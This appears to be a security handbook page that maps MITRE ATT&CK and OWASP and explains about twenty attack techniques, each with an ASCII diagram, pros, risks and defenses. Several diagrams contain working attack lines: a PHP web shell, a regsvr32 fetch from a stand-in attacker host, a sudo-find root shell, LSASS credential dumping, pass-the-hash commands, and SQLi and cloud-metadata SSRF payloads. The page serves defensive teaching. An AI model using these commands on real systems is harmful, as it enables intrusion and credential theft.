Hacking#
Reference catalog of attack techniques an operator should recognize. The page is structured in two halves: a brief catalog that maps the major taxonomies (MITRE ATT&CK, OWASP Top 10) so an unknown technique can be located, and a longer technique deep dives section where each technique gets a description, an attacker / victim diagram, and the operator’s risk / reward trade-off.
The MITRE ATT&CK Enterprise matrix has ~200 techniques and ~600+ sub-techniques across 14 tactics; OWASP Top 10 covers the highest- impact web application weaknesses. This page is the index, not the encyclopedia; follow the references at the end for the full matrices.
Use only against systems you own or have written authorization to test. The same techniques are evidence in real intrusions.
ATT&CK Tactics#
The 14 tactical phases of an enterprise intrusion. Each is a why; techniques under it are the how.
Tactic |
Adversary goal |
|---|---|
Reconnaissance (TA0043) |
Gather information before touching the target. |
Resource Development (TA0042) |
Build or buy infrastructure: domains, malware, certs. |
Initial Access (TA0001) |
Get the first foothold. |
Execution (TA0002) |
Run adversary code on a system. |
Persistence (TA0003) |
Survive reboots, password changes, cleanup. |
Privilege Escalation (TA0004) |
Gain higher-level permissions. |
Defense Evasion (TA0005) |
Avoid detection; bypass controls. |
Credential Access (TA0006) |
Steal account names, passwords, tokens, keys. |
Discovery (TA0007) |
Learn about the environment from inside. |
Lateral Movement (TA0008) |
Pivot to other systems. |
Collection (TA0009) |
Gather data of interest. |
Command and Control (TA0011) |
Communicate with compromised systems. |
Exfiltration (TA0010) |
Steal the data out. |
Impact (TA0040) |
Manipulate, interrupt, or destroy. |
OWASP Top 10 (2021)#
Risk |
Description |
|---|---|
A01 Broken Access Control |
Authz bypass, IDOR, missing function-level checks. |
A02 Cryptographic Failures |
Weak / outdated crypto, missing TLS, hardcoded keys. |
A03 Injection |
SQL / NoSQL / OS / LDAP / template injection. |
A04 Insecure Design |
Threat-model gaps, missing rate limits, business logic. |
A05 Security Misconfiguration |
Default creds, verbose errors, open buckets, bad CORS. |
A06 Vulnerable Components |
Outdated libraries, known-CVE deps, supply chain. |
A07 Auth and Identification |
Weak passwords, missing MFA, broken sessions. |
A08 Software and Data Integrity |
Unsigned updates, deserialisation, untrusted CI/CD. |
A09 Security Logging |
Missing audit logs, unmonitored systems. |
A10 Server-Side Request Forgery |
Server fetches attacker-controlled URL. |
Index of techniques covered below#
The catalog lists every technique by name; the deep dives below cover the highest-impact ones. The detailed list, by tactic.
Recon, Active Scanning, Search Open Tech DBs, Phishing for Info
Initial Access, Phishing, Exploit Public-Facing, Valid Accounts, Supply Chain
Execution, PowerShell, Exploitation for Execution, User Execution
Persistence, Boot/Logon Autostart, Scheduled Tasks, Account Manipulation, Web Shell
Privilege Escalation, Sudo abuse, Token Manipulation, Kernel exploit
Defense Evasion, Process Injection, LOLBins, Obfuscated files, Disable EDR
Credential Access, LSASS dump, Password Spraying, Kerberoasting, Cred stores
Discovery, Account / Service / Share enumeration
Lateral Movement, Pass the Hash, RDP / SSH, Pass the Ticket
C2, HTTPS C2, DNS tunnel, Domain Fronting
Exfiltration, C2 channel, alt protocol, cloud storage
Impact, Ransomware, Wipe, Defacement
Web, SQLi, XSS, SSRF, IDOR, SSTI, XXE, Deserialisation, JWT
Network, ARP spoof, NTLM relay, Zerologon, EternalBlue
Wireless, Evil Twin, WPA2 PSK crack, KRACK, GPS spoof
Cloud, IMDS SSRF, Public bucket, Token theft, Container escape
Social, Phishing, Vishing, MFA Fatigue, BEC, SIM Swap
Technique deep dives#
Each technique below follows the same template: a one-line description, a small attacker / victim diagram, and the operator’s trade-off (pros / risks / detection). Use the diagrams to talk a colleague through the attack on a whiteboard; use the trade-offs to pick which technique fits the engagement.
Initial Access#
Phishing (T1566)#
Description. Adversary delivers a malicious link, attachment, or service-impersonation message to one or many recipients. Sub-techniques: spearphishing link / attachment / via service.
attacker infra (mail / SaaS) victim
│ │ │
│ craft email │ │
├──────────► send via SPF-aligned │ │
│ domain or compromised │ inbox delivery │
│ relay ├───────────────────────────►│
│ │ │
│ │ user clicks link / │
│ │ opens attachment │
│ ◄──────────── payload / cred ──┤ │
│ callback ◄───────────────────────────┤
│ │
▼ ▼
foothold + creds credential leak
or code execution
Pros (attacker), works against humans, not patches; cheap per-target; bypasses most network controls.
Risks, noisy at scale; domain reputation costs; AV / mail sandbox detonation; user reporting.
Defenses, DMARC / DKIM / SPF, mail sandboxing, user training, FIDO2 / hardware keys to neutralize credential phish, link-rewriting gateways.
Exploit Public-Facing Application (T1190)#
Description. Adversary exploits a software bug in an internet-facing service (web app, VPN, mail server, file transfer appliance) to gain code execution.
attacker victim (public service)
│ HTTP / TLS │
├─────────────────────────────────────────────────────►│
│ payload exploits CVE-XXXX-YYYY │
│ │
│ ◄──────────────────────── RCE / shell ────────────┤
│ ▼
│ attacker code on box
│ (often as web user)
Pros, direct, no human in the loop; one good CVE = many targets.
Risks, patched fast; signature-detected; exploits burn quickly.
Defenses, patch SLAs, WAF, network IDS, attack-surface monitoring, EDR on appliances.
Valid Accounts (T1078)#
Description. Use legitimate credentials, default, leaked, purchased, or stolen, to log in through normal channels (VPN, SSH, OAuth, RDP).
leak / phish / stuff attacker victim
─────────────────── │
│ username + password │
creds purchased on ────────────►├──────────────────────────────►│
underground market │ │
│ ◄──── session ──────────── │
▼ ▼
normal-looking login looks legitimate
Pros, looks like real activity; bypasses many detections; no code on disk.
Risks, MFA blocks most password-only attempts; impossible- travel and behavioral analytics catch reuse.
Defenses, MFA (FIDO2 strongest), conditional access, password-reuse detection, dark-web monitoring for leaked creds.
Execution#
PowerShell (T1059.001)#
Description. Run adversary code via the Windows PowerShell interpreter, inline, base64-encoded, or downloaded at runtime.
attacker payload (.ps1)
│
▼
powershell.exe -enc <base64>
│
├── invokes .NET assemblies
├── pulls remote payloads (IEX (New-Object Net.WebClient))
└── reflects DLL into memory
victim host attacker C2
│ │
│ WMI / scheduled task / shortcut runs PS │
│ ──────────► PowerShell loads + runs │
│ ──────────► outbound HTTPS ────►│
│ ▼
Pros, on every Windows host; fileless variants leave little disk evidence.
Risks, AMSI, Constrained Language Mode, ScriptBlock / Module logging, EDR script telemetry.
Defenses, enforce Constrained Language Mode, enable ScriptBlock logging, app control on PS, alert on encoded command lines.
Persistence#
Scheduled Task / Job (T1053)#
Description. Register a recurring task (cron, at, schtasks, launchd) that runs the adversary payload regardless of who is logged in.
attacker (with code-exec) victim host
│
│ schtasks /create /tn evil /tr C:\bad.exe
│ /sc HOURLY /ru SYSTEM
├────────────────────────────► /etc/cron.d/.evil
│ /var/spool/cron/...
│ HKLM\..\Schedule\TaskCache
│ │
│ ▼
│ ⏰ task fires every hour
│ │
│ ◄──────── callback / payload ◄──────────────┘
Pros, survives reboots without modifying binaries; schedulable; SYSTEM-level execution easy.
Risks, task DBs are well-instrumented; named tasks stand out; defenders diff against baselines.
Defenses, audit
Microsoft-Windows-TaskSchedulerevents, baseline cron entries, sysmon rule on schtasks.
Web Shell (T1505.003)#
Description. Drop an attacker-controlled script (PHP, ASP, JSP, .NET) into the web root so HTTP requests with a magic parameter execute commands.
internet victim web server
│
├─ /var/www/html/.shell.php
│ <?php system($_GET['c']); ?>
│
attacker ──── GET /.shell.php?c=id ─►│
│
◄──────── uid=33(www-data) ─┤
Pros, C2 disguised as normal web traffic; survives most reboots; works through restrictive egress.
Risks, filename / hash known to defenders; web-server logs show requests with strange parameters.
Defenses, file-integrity monitoring on the web root, WAF signatures, anomalous parameter / URI alerting, YARA rules.
Privilege Escalation#
Sudo / Setuid Abuse (T1548.003)#
Description. Misconfigured sudo rules or world-writable
setuid binaries let a low-priv user run commands as root.
low-priv user host
│
│ sudo -l ► "may run /usr/bin/find as root"
│
├─────────────► sudo find /etc -exec /bin/sh \;
│ │
│ ◄──── root shell ◄──────────────────┘
▼
uid=0(root)
Pros, no exploit code; uses legitimate binaries; bypasses most EDRs that focus on malware.
Risks,
sudolog entries are obvious; a curated allowlist closes the gap.Defenses, audit
/etc/sudoers; requireNOPASSWDon specific commands only;sudoreplayof root sessions; remove unnecessary setuid bits.
Defense Evasion#
Process Injection (T1055)#
Description. Allocate memory in another running process and execute attacker code from inside it, inheriting that process’s identity, network rules, and parent / EDR profile.
attacker process victim process (e.g. explorer.exe)
│
│ OpenProcess(PID, ALL_ACCESS)
│ VirtualAllocEx(remote, RWX)
│ WriteProcessMemory(payload)
│ CreateRemoteThread(start)
├──────────────────────────────► ┌──────────────┐
│ │ shellcode │
│ │ running as │
│ │ explorer │
│ └──────────────┘
Pros, payload lives in a trusted process; EDR sees
explorer.exemaking the C2 callout, not malware.exe.Risks, modern EDR hooks the injection APIs; AMSI / ETW see the payload.
Defenses, enable ETW / Sysmon process / thread-create events, block remote-thread / WriteProcessMemory from non-LSASS processes, hardware-rooted attestation.
Living-Off-the-Land Binaries (LOLBins, T1218)#
Description. Use signed, trusted, OS-shipped binaries
(rundll32, mshta, regsvr32, msiexec,
certutil) to download / execute payloads.
attacker C2 victim host
│ payload.sct on web server │
│ │
│ regsvr32 /s /n /u /i:http://attacker/payload.sct scrobj.dll
│ ◄──────────────────────── │
│ │
│ payload.sct ───► loaded by signed binary ▼
│ attacker code
running as user
under signed-binary parent
Pros, application allowlists let signed binaries through; forensics reads “Microsoft Corp” as parent.
Risks, known LOLBins are well-cataloged (lolbas-project.github.io); EDR baselines unusual command lines.
Defenses, WDAC / AppLocker rules that block specific LOLBin invocation patterns; EDR rules on rundll32 with unusual parents / args.
Credential Access#
LSASS Memory Dump (T1003.001)#
Description. Read or dump the memory of lsass.exe to
extract NTLM hashes, Kerberos tickets, and clear-text passwords.
attacker (admin / SeDebug) lsass.exe
│ procdump.exe -ma lsass.exe out.dmp │
│ comsvcs.dll MiniDump │
│ mimikatz sekurlsa::logonpasswords │
├───────────────────────────────────────────►│
│ │
│ ◄──── memory image / parsed creds ────────│
▼
pile of NTLM hashes, Kerberos TGTs, plaintext passwords (if WDigest enabled)
Pros, one shot, many credentials, often domain admin.
Risks, LSASS access is heavily monitored; ProtectedProcess and Credential Guard block most reads.
Defenses, enable LSASS Protected Process Light, Credential Guard, ATP / Defender for Identity, alert on
OpenProcessto LSASS from non-system parents.
Password Spraying (T1110.003)#
Description. Try one common password (Spring2026!) against
many accounts. Avoids account lockout that hits “many passwords
against one account” brute force.
attacker org SSO / VPN
│ │
│ alice@org : Spring2026! ────────────────►│ fail
│ bob@org : Spring2026! ────────────────►│ fail
│ carol@org : Spring2026! ────────────────►│ ✓ success
│ ... │
│ one pwd × N users, with lockout-safe pacing │
Pros, works against any unprotected SSO; finds the weakest user, not the weakest password.
Risks, spike in failed logins is a signature; many IdPs throttle.
Defenses, MFA, conditional access, lockout / pacing detection, geo-velocity alerting.
Kerberoasting (T1558.003)#
Description. Request Kerberos service tickets (TGS) for service accounts, take the encrypted blob offline, crack the service account’s password.
attacker (any domain user) DC (KDC)
│ TGS-REQ for SPN MSSQLSvc/db1.contoso.local │
├────────────────────────────────────────────────────►│
│ ◄── TGS ticket encrypted with service-account NTLM │
│
▼ hashcat -m 13100 tickets.txt rockyou.txt
cracked clear-text password
│
▼
login as the service account (often privileged)
Pros, only requires one valid domain user to start; offline cracking is invisible to network monitoring.
Risks, AES-256 service-ticket encryption resists cracking; honeypot SPNs alert defenders.
Defenses,
msDS-ManagedPasswordInterval(gMSA), strong service-account passwords, alert on TGS-REQ for many SPNs from one user.
Lateral Movement#
Pass the Hash (T1075 / T1550.002)#
Description. Authenticate to SMB / WinRM using a stolen NTLM hash directly, without ever knowing the cleartext password.
attacker (with NTLM hash from Host A)
│
│ pth-winexe -U user%aad3b... ────────────► Host B
│ impacket-psexec hashes:lm:nt ────────────► Host B
│ │
│ ◄──────── shell as user ◄────────────────────┘
│
▼ repeat for Host C, D, ... until DA
Pros, MFA on workstations doesn’t apply to SMB / WinRM; no password to try / fail.
Risks, restricted admin / Credential Guard / LAPS make hash reuse harder; KB5005413 disables NTLM in many estates.
Defenses, LAPS for unique local admin passwords, disable NTLM where possible, tier-0 admin segmentation, alert on Type-9 logons to many hosts in a window.
Command and Control#
HTTPS C2 (T1071.001)#
Description. Adversary tunnels command-and-control over HTTPS to a domain that looks legitimate; payload is encrypted inside TLS.
victim (compromised host) attacker C2
│ │
│ TLS to cdn-cache.example.com │
├──────────────────────────────────────►│
│ ◄── tasking (commands) ─────────────│
│ ── results / files ─────────────────►│
│ │
│ jitter + sleep makes traffic look │
│ like normal browser polling │
Pros, blends with normal browsing traffic; TLS hides payload from IDS; egress almost always allowed.
Risks, domain reputation, TLS fingerprint (JA3 / JA4), beacon-pattern detection by NDR.
Defenses, TLS inspection where possible, JA3 baselining, domain-reputation feeds, beacon-cadence detection (sliding variance on inter-request times).
DNS Tunnelling (T1071.004)#
Description. Encode C2 traffic in DNS query names / TXT records. Slow but bypasses many egress filters that allow DNS.
victim attacker auth NS
│ resolve abc123.cmd.attacker.example │
├────────────────────────────────────────►│
│ ◄── TXT "ZWNobyBoZWxsbw==" (cmd) ────│
│
│ exec, encode result, query again │
├────────────────────────────────────────►│
│ ... │
Pros, works through corporate firewalls that allow DNS; no proxy interception.
Risks, entropy on subdomain labels stands out; query rate to one zone is anomalous.
Defenses, log all DNS at the resolver, alert on high- entropy / high-rate queries to a single zone, sinkhole known-bad zones.
Web app techniques#
SQL Injection#
Description. Attacker input concatenated into a SQL query
modifies the query’s intent, returning data, mutating tables,
or executing OS commands via xp_cmdshell.
attacker app
│ GET /search?q=' OR 1=1-- │
├────────────────────────────────────────────►│ builds query:
│ │ SELECT * FROM users
│ │ WHERE name = '' OR 1=1--'
│ │
│ ◄────────────── full table dump ───────────│
Pros, directly reads / writes the database; often authentication bypass; Union / blind / time-based variants cover almost any case.
Risks, WAFs catch the obvious cases; parameterized queries shut it down entirely.
Defenses, prepared statements / ORM, least-privilege DB user, WAF in negative + positive mode, query-pattern logging.
Cross-Site Scripting (XSS)#
Description. Attacker-controlled JavaScript runs in a victim’s browser inside the target site’s origin, access to cookies, DOM, fetch credentials.
attacker site victim browser
│ POST /comment │ │
│ body=<script>... │ store in DB │
├─────────────────────►│ │
│ │ │
│ │ GET /thread │
│ │◄─────────────────────────│
│ │ ── HTML w/ <script> ───►│
│ │ runs in
│ ◄──── document.cookie / fetch + send ─────────│ victim origin
▼
cookies / session tokens leaked
Pros, session hijack, credential theft, defacement, all in one bug; scales across every visitor.
Risks, modern frameworks auto-escape; CSP and HttpOnly + SameSite cookies blunt impact.
Defenses, output encoding, CSP, HttpOnly cookies, Trusted Types, WAF for the obvious payloads.
Server-Side Request Forgery (SSRF)#
Description. App fetches a URL from user input. Attacker points it at internal services or cloud metadata.
attacker target app internal / cloud
│ POST /fetch │ │
│ url=http://169.254.169.254/... │ │
├───────────────────────────────────►│ │
│ │ GET (from app's NIC) │
│ ├───────────────────────►│
│ │ ◄── IAM creds ────── │
│ ◄── proxied response (creds) ─────│ │
▼
AWS / GCP / Azure session tokens
Pros, pivots from web app into the cloud control plane; often full-account takeover.
Risks, IMDSv2 (token-based) blocks the easy AWS path; network egress filters break it.
Defenses, IMDSv2-only, deny-list private ranges in fetchers, fetch via a dedicated proxy that resolves and rejects internal IPs.
Insecure Direct Object Reference (IDOR)#
Description. App uses a predictable identifier (sequential
id, account number) without authorization check, letting
one user read or modify another’s data.
attacker (logged in as user 42) app
│ GET /api/orders/9001 (mine) │ authz check ok
├───────────────────────────────────────────►│
│ GET /api/orders/9002 (someone else)│ no check
├───────────────────────────────────────────►│
│ ◄── someone else's order ─────────────────│
▼
Pros, trivial to find by incrementing IDs; no exploit code; full data exposure.
Risks, proper authz middleware closes it; pen-test scanners catch it routinely.
Defenses, authorize on every object access, opaque IDs (UUIDs are not authz, but help against enumeration), automated authz-fuzzing in CI.
Network and host#
NTLM Relay (T1187 / T1557.001)#
Description. Trick a host into authenticating to the attacker (LLMNR poisoning, PetitPotam), then relay the auth to a second target the victim has rights to.
victim host attacker target service
│ query name │ responder.py │
├──────────────────────────────►│ │
│ ◄── pretend I have it ───────│ │
│ send NTLM auth ──────────────│ │
│ │ relay NTLM auth ──►│
│ │ ◄── access ──────│
│ ▼
│ attacker now reads / writes
│ what victim could
Pros, no cracking; bridges two scopes (workstation -> LDAP / SMB / HTTP); often domain-admin path.
Risks, SMB signing / LDAP signing / Channel Binding break the relay; KB5005413 mitigations.
Defenses, enforce SMB / LDAP signing, EPA on HTTPS, disable LLMNR / NetBIOS, modern auth (Kerberos with FAST).
Zerologon (CVE-2020-1472)#
Description. Netlogon used AES-CFB8 with an all-zero IV; an attacker can blank the DC’s machine password, then reset it.
attacker (any LAN host) unpatched DC
│ send 256 NetrServerAuthenticate3 │
│ with zero ClientCredential │
├────────────────────────────────────────►│
│ ◄── one in 256 succeeds ───────────────│
│ set DC machine password to empty │
├────────────────────────────────────────►│
│ ◄────────── DA via dcsync ─────────────│
Pros, unauthenticated RCE-equivalent on the DC; from network-only adjacency to domain admin in ~3 seconds.
Risks, patched since 2020; signature-detected; resets the DC machine password and breaks AD until restored.
Defenses, patch (and the August 2020 + February 2021 enforcement updates), monitor
Microsoft-Windows-Netlogonevents 5827 / 5828 / 5829.
Wireless#
Evil Twin#
Description. Stand up a rogue access point with the target’s SSID. Devices that have auto-connect to that SSID join the attacker’s AP.
victim laptop attacker AP internet
│ beacon for "CorpWifi" │
│ ◄────────────────────────────────│ beacon "CorpWifi"
│ associate, DHCP, gateway = AP │
├──────────────────────────────────►│ ── pass through ───►
│ │ log creds, MITM TLS
│ │ inject payloads
Pros, works without breaking encryption; clients trust saved SSIDs; MITM full traffic.
Risks, 802.1X / EAP-TLS prevents association; Wi-Fi intrusion detection finds duplicate BSSIDs.
Defenses, WPA3 + 802.1X with cert validation, “delete saved network” policies, WIDS that flags duplicate SSIDs.
Cloud#
IMDS SSRF (cloud metadata theft)#
Description. Attacker uses an SSRF in a cloud-hosted app to reach the instance metadata service and steal IAM credentials.
attacker vulnerable web app on EC2
│ fetch?url= │
│ http://169.254.169.254/ │
│ latest/meta-data/iam/ │
│ security-credentials/RoleX │
├──────────────────────────────►│
│ │ IMDSv1 returns JSON
│ ◄── temp AccessKey/Secret ───│
▼
aws sts get-caller-identity → assume RoleX from anywhere
Pros, one SSRF -> full role permissions; works from the attacker’s laptop with the stolen creds.
Risks, IMDSv2 mandatory mode blocks the trivial path; egress allowlists cap the damage.
Defenses, enforce IMDSv2 (AWS), use Workload Identity Federation, scope IAM roles tightly, alert on STS calls from unexpected source IPs.
Container Escape (T1611)#
Description. Break out of a container into the host kernel or container manager, gaining the host’s privileges.
container (privileged or vulnerable runc)
│
│ /proc/1/attr, hostPath mount,
│ CAP_SYS_ADMIN, CVE in runc
▼
host kernel
│
▼
every other container on the host
Pros, one bug = the whole node; lateral movement to all workloads on the same host.
Risks, modern runtimes (gVisor, Kata, Firecracker) make escapes much harder; OS-level seccomp / AppArmor blocks most paths.
Defenses, gVisor / Kata for hostile workloads,
--security-opt+ seccomp / AppArmor, drop capabilities, read-only root filesystem, no privileged containers.
Impact#
Ransomware (T1486)#
Description. Encrypt the victim’s data with a key the attacker holds and demand payment for the decryption key. Modern variants double-extort: encrypt + threaten to publish the stolen copy.
attacker (with code-exec on many hosts)
│ enumerate, exfiltrate sensitive data first
├──────────────────────────────────────────► leak site / staging
│
│ on every host:
│ delete shadow copies, backups, snapshots
│ encrypt with AES + RSA-wrapped key
│ leave note with TOR contact
▼
victim files unreadable; backups gone if not air-gapped
Pros (attacker), direct cash-out via crypto; double extortion increases conversion; many orgs pay.
Risks, LE tracking of crypto flows; reputational + legal cost; some jurisdictions ban paying.
Defenses, offline / immutable backups, MFA + EDR + email hygiene to block the upstream chain, network segmentation, rapid-response IR retainer.
References#
MITRE ATT&CK Enterprise, the full matrix; the standard taxonomy.
MITRE D3FEND, defensive techniques mapped to ATT&CK.
CWE, Common Weakness Enumeration.
CAPEC, attack-pattern catalog.
NIST NVD, known vulnerabilities.
LOLBAS, living-off-the-land binaries (Windows).
GTFOBins, Unix LOLBins.
Atomic Red Team, ATT&CK-mapped test scripts.
HackTricks, community pentesting reference.
PayloadsAllTheThings, payload bank.
Sigma, detection-rule format.
Routes, Reconnaissance, where each category fits the operator’s mission.
Social engineering#
MFA Fatigue (T1621)#
Description. Attacker has the password; spam push-MFA prompts to the victim until they tap “approve” out of habit or to make the buzz stop.
attacker (with cred) IdP victim phone │ login as alice │ │ ├───────────────────────────────►│ push MFA prompt #1 │ │ ├─────────────────────────────►│ ✗ │ retry │ push MFA prompt #2 │ ├───────────────────────────────►├─────────────────────────────►│ ✗ │ retry × N │ ... │ │ │ push MFA prompt #50 │ │ ├─────────────────────────────►│ ✓ │ ◄────────── session ──────────│ user taps approve │Pros, defeats classic push MFA; cheap; near-zero technical sophistication.
Risks, number-matching MFA blocks it; users can be trained.
Defenses, number-matching / verified push MFA, FIDO2 / WebAuthn (no push at all), rate-limit prompts per user, alert on N-prompts-per-window.
Business Email Compromise (BEC)#
Description. Attacker takes over or impersonates an executive’s email and instructs finance / accounting to wire money or reroute payment instructions to attacker-controlled accounts.
attacker (compromised CEO inbox or look-alike domain) │ │ "Process this wire urgently before EOD." │ attached fake invoice, real-looking signature ├──────────────────────────────────────► finance@victim.com │ │ │ │ wire transfer │ ▼ │ ◄────────── $$$ to mule account ───────────────Pros, huge financial reward; little technical footprint; often slides past anti-phishing because the email isn’t malicious in content.
Risks, callback / out-of-band verification breaks it; SPF / DKIM / DMARC on look-alike domains.
Defenses, mandatory phone callback for wires above $X, SPF / DKIM / DMARC strict mode, payment-change controls, vendor-portal-only updates.